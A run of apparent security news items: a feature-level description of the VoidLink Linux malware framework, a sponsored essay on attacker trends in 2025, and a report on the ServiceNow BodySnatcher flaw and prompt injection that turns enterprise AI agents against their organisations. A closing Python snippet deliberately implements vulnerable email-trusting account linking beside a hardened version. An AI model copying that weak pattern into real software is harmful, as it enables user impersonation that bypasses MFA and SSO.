- A Chinese-language web-based dashboard that allows the attackers to remotely control the implant, build bespoke versions on the fly, manage files, tasks, and plugins, and carry out the different stages of the attack cycle, from reconnaissance and persistence to lateral movement and defense evasion by wiping traces of malicious activity

[Figure: Builder panel used to create customized versions of VoidLink]

VoidLink supports 37 plugins spanning anti-forensics, reconnaissance, containers, privilege escalation, lateral movement, and other categories, transforming it into a full-fledged post-exploitation framework:
- Anti-forensics: wipe or edit logs and shell history based on keywords, and timestomp files to hinder analysis
- Cloud: Kubernetes and Docker discovery and privilege escalation, container escapes, and probes for misconfigurations
- Credential harvesting: collect credentials and secrets, including SSH keys, Git credentials, local password material, browser credentials and cookies, tokens, and API keys
- Lateral movement: spread using an SSH-based worm
- Persistence: establish persistence via dynamic linker abuse, cron jobs, and system services
- Recon: gather detailed system and environment information

Describing it as “impressive” and “far more advanced than typical Linux malware,” Check Point said VoidLink features a core orchestrator component that handles C2 communications and task execution.
It also incorporates a bevy of anti-analysis features to circumvent detection. Besides flagging various debuggers and monitoring tools, it can delete itself if any signs of tampering are detected. It also features a self-modifying code option that can decrypt protected code regions at runtime and encrypt them when not in use, bypassing runtime memory scanners. What’s more, the malware framework enumerates installed security products and hardening measures on the compromised host to calculate a risk score and arrive at an evasion strategy across the board.
For example, this may involve slowing down port scans and exercising greater caution in high-risk environments. “The developers demonstrate a high level of technical expertise, with strong proficiency across multiple programming languages, including Go, Zig, C, and modern frameworks such as React,” Check Point noted. “In addition, the attacker possesses in-depth knowledge of sophisticated operating system internals, enabling the development of advanced and complex solutions.” “VoidLink aims to automate evasion as much as possible, profiling an environment and choosing the most suitable strategy to operate in it. Augmented by kernel mode tradecraft and a vast plugin ecosystem, VoidLink enables its operators to move through cloud environments and container ecosystems with adaptive stealth.”
What Should We Learn From How Attackers Leveraged AI in 2025?
Old Playbook, New Scale: While defenders are chasing trends, attackers are optimizing the basics The security industry loves talking about “new” threats. AI-powered attacks. Quantum-resistant encryption. Zero-trust architectures.
But looking around, it seems the most effective attacks in 2025 are much the same as they were in 2015. Attackers are exploiting the same entry points that have always worked; they're just doing it better.

Supply Chain: Still Cascading Downstream

As the Shai-Hulud npm campaign showed, supply chain compromise remains a major issue. A single compromised package can cascade through an entire dependency tree, affecting thousands of downstream projects.
The attack vector hasn’t changed. What’s changed is how efficiently attackers can identify and exploit opportunities. AI has collapsed the barrier to entry. Just as AI has enabled one-person software projects to build sophisticated applications, the same is true in cybercrime.
What used to require large, organized operations can now be executed by lean teams, even individuals. We suspect some of these NPM package attacks, including Shai-Hulud, might actually be one-person operations. As software projects become simpler to develop, and threat actors show an ability to play the long game (as with the XZ Utils attack), we’re likely to see more cases where attackers publish legitimate packages that build trust over time, then one day, with the click of a button, inject malicious capabilities into all downstream users.
Phishing: Still Just One Click Away
Phishing still works for the same reason it always has: humans remain the weakest link.
But the stakes have changed dramatically. The recent npm supply chain attack demonstrates the ripple effect: one developer clicked a bad link, entered his credentials, and his account was compromised. Packages with tens of millions of weekly downloads were poisoned. Despite the developer publicly reporting the incident to npm, mitigation took time - and during that window, the attack spread at scale.
Official Stores: Still Not Safe
Perhaps most frustrating: malware continues to bypass official gatekeepers. Our research on malicious Chrome extensions stealing ChatGPT and DeepSeek conversations revealed something we already know from mobile app stores—automated reviews and human moderators aren’t keeping pace with attacker sophistication.
The permissions problem should sound familiar because it’s already been solved. Android and iOS give users granular control: you can allow location access but block the microphone, or permit camera access only when an app is open, not in the background.
Chrome could implement the same model for extensions - the technology exists. It’s a matter of prioritization and implementation. Instead, users face a binary choice with extensions requesting permission to “read information from all websites.” If an extension asks for that level of access, in most cases it will be used for malicious purposes, or it will later be updated to do so.
Attackers don’t have the Shiny Tool Syndrome
Attackers didn’t throw out their playbook when AI arrived - they automated it.
They’re still exploiting supply chains, phishing developers, and sneaking malware past reviewers. They’re just doing it with one-tenth the resources. We shouldn’t be chasing shiny new defense strategies while the basics still don’t work. Fix permissions models. Harden supply chain verification. Make phishing-resistant authentication the default. The fundamentals matter more now, not less. Attackers optimized the basics.
What should defenders prioritize? Join OX for our upcoming webinar: Threat Intelligence Update: What’s Been Working for Hackers and What Have the Good Guys Been Doing? We’ll cover attack techniques gaining traction, what’s actually stopping them, and what to prioritize when resources are limited. Register here.
Note: This article was exclusively written and contributed by Moshe Siman Tov Bustan, Security Research Team Lead at OX.
ServiceNow Patches Critical AI Platform Flaw Allowing Unauthenticated User Impersonation
ServiceNow has disclosed details of a now-patched critical security flaw impacting its ServiceNow artificial intelligence (AI) Platform that could enable an unauthenticated user to impersonate another user and perform arbitrary actions as that user. The vulnerability, tracked as CVE-2025-12420, carries a CVSS score of 9.3 out of 10.0. It has been codenamed BodySnatcher by AppOmni. “This issue […] could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform,” the company said in an advisory released Monday.
The shortcoming was addressed by ServiceNow on October 30, 2025, by deploying a security update to the majority of hosted instances, with the company also sharing the patches with ServiceNow partners and self-hosted customers. The following versions include a fix for CVE-2025-12420:
- Now Assist AI Agents (sn_aia) - 5.1.18 or later and 5.2.19 or later
- Virtual Agent API (sn_va_as_service) - 3.15.2 or later and 4.0.4 or later
ServiceNow credited Aaron Costello, chief of SaaS Security Research at AppOmni, with discovering and reporting the flaw in October 2025. While there is no evidence that the vulnerability has been exploited in the wild, users are advised to apply an appropriate security update as soon as possible to mitigate potential threats. “BodySnatcher is the most severe AI-driven vulnerability uncovered to date: Attackers could have effectively ‘remote controlled’ an organization’s AI, weaponizing the very tools meant to simplify the enterprise,” Costello told The Hacker News.
In a separate report, AppOmni said the Virtual Agent integration flaw allows unauthenticated attackers to impersonate any ServiceNow user using only an email address, bypassing multi-factor authentication (MFA) and single sign-on (SSO) protections. Successful exploitation could allow a threat actor to impersonate an administrator and execute an AI agent to subvert security controls and create backdoor accounts with elevated privileges. “By chaining a hardcoded, platform-wide secret with account-linking logic that trusts a simple email address, an attacker can bypass multi-factor authentication (MFA), single sign-on (SSO), and other access controls,” Costello added. “And it’s the most severe AI-driven security vulnerability uncovered to date.
With these weaknesses linked together, the attacker can remotely drive privileged agentic workflows as any user.” The disclosure comes nearly two months after AppOmni revealed that malicious actors can exploit default configurations in ServiceNow’s Now Assist generative AI platform and leverage its agentic capabilities to conduct second-order prompt injection attacks. The issue could then be weaponized to execute unauthorized actions, enabling attackers to copy and exfiltrate sensitive corporate data, modify records, and escalate privileges.
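To make the weakness class described above concrete, here is a hypothetical Python model, added here and not ServiceNow's or AppOmni's code, of account linking that trusts a caller-supplied email under one platform-wide static secret, beside a hardened form that only accepts a single-use assertion the tenant's identity provider issued after its own MFA/SSO step. The user directory, secret values and function names are all constructed for the illustration.

```python
import hashlib
import hmac
import secrets

# Constructed user directory: e-mail -> (user id, role). Not real accounts.
USERS = {
    "admin@example.invalid": ("sys_admin", "admin"),
    "alice@example.invalid": ("alice", "user"),
}

# Weak pattern: one static secret shared by every installation of the
# integration (constructed placeholder value, not a real credential).
PLATFORM_WIDE_SECRET = b"same-secret-on-every-install"


def link_account_weak(email: str, presented_secret: bytes):
    """Vulnerable linking: whoever holds the platform-wide secret may name any
    e-mail and is treated as that user; MFA and SSO are never consulted."""
    if not hmac.compare_digest(presented_secret, PLATFORM_WIDE_SECRET):
        return None
    return USERS.get(email)


# Hardened pattern: the link must carry an assertion that the tenant's identity
# provider (IdP) issued for this subject after its own MFA/SSO, bound with a
# per-tenant key and a single-use nonce, so it can be neither forged nor replayed.
PER_TENANT_IDP_KEY = secrets.token_bytes(32)
_USED_NONCES: set[str] = set()


def idp_issue_assertion(email: str, key: bytes = PER_TENANT_IDP_KEY) -> tuple[str, str]:
    """Stand-in for the IdP minting an assertion after it authenticated `email`."""
    payload = f"{email}|{secrets.token_hex(8)}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return payload, tag


def link_account_hardened(payload: str, tag: str, key: bytes = PER_TENANT_IDP_KEY):
    """Accept the e-mail only if the assertion verifies under the tenant key
    and its nonce has not been presented before (replay rejected)."""
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    email, _, nonce = payload.partition("|")
    if nonce in _USED_NONCES:
        return None
    _USED_NONCES.add(nonce)
    return USERS.get(email)
```

In the weak form the email is the only thing naming the victim, which is why MFA and SSO are irrelevant; in the hardened form the email is not accepted unless it arrives inside an assertion the IdP bound to the subject it actually authenticated.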